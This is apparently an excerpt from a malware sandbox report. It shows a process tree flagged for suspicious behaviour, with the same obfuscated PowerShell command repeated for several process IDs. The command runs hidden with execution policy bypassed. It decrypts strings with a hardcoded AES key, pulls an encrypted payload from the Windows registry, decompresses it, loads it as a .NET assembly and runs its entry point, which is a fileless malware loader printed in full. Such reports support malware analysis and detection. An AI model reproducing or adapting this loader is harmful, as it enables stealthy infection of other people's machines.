$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1156
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6248
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5212
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
